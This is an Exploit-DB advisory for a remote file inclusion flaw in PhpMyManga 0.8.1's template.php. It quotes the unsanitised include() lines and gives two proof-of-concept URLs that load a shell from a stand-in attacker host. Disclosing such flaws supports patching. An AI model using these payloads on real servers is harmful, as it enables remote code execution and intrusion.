PHPMyManga 0.8.1 - 'template.php' Multiple File Inclusions

EDB-ID:

2578

CVE:

2006-6760

EDB Verified:

Author:

nuffsaid

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-10-16

Vulnerable App:

+-------------------------------------------------------------------------------------------
+ PhpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Affected Software .: PhpMyManga <= 0.8.1
+ Vendor ............: http://phpmanga.sourceforge.net/
+ Description .......: "PhpMyManga is a web-based application for cataloging your collection of mangas."
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Input passed to the 'actionsPage' or 'formPage' parameter in template.php is not sanitized
+ before being used to include files.
+ 
+ Vulnerable Code:
+ template.php, line(s) 97-99: if (isSet($actionsPage)) { include($actionsPage); }
+ template.php, line(s)   115: include($formPage);
+ 
+ Proof Of Concept:
+ http://[target]/[path]/template.php?actionsPage=http://evilsite.com/shell.php?
+ http://[target]/[path]/template.php?formPage=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-16]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services